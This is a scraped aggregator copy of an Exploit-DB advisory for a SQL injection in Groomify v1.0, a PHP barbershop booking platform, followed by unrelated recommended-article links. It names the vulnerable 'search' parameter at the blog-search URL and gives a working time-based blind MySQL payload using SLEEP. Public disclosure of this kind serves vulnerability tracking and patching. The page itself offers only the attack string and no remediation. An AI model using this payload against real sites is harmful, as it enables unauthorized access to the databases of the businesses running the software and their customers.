[webapps] Groomify v1.0 - SQL Injection

1 year ago

source link: https://www.exploit-db.com/exploits/51526
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Groomify v1.0 - SQL Injection

EDB-ID:

51526

EDB Verified:

Platform:

PHP

Date:

2023-06-19

Vulnerable App:

# Exploit Title: Groomify v1.0 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
# Demo Site: https://script.bugfinder.net/groomify
# Tested on: Kali Linux
# CVE: N/A


### Vulnerable URL ###

https://localhost/groomify/blog-search?search=payload


### Parameter & Payloads ###

Parameter: search (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
AND 'rszk'='rszk

Copy

Recommend

[webapps] Groomify v1.0 - SQL Injection

Groomify v1.0 - SQL Injection

EDB-ID:

51526

Platform:

PHP

Date:

2023-06-19

Recommend

nanoURLy - Fast and reliable URL shortener app | Product Hunt

像父亲节这种按每年几月第几个星期几的节日，你们是如何设置提醒的？

Full-stack insights, analytics, & CRM platform for Discord

Create and Open A Modal in Phoenix 1.7

Wealthiest People in Singapore (June 20, 2023)

Best AirPods Max alternatives 2023

京东旧将闫小兵回归，入职综合部

这届年轻人“吃翻”东南亚榴莲

马云来到阿里云园区和张勇一起喝咖啡聊未来

Do you want your children to be like you? A programmer's perspective

About Joyk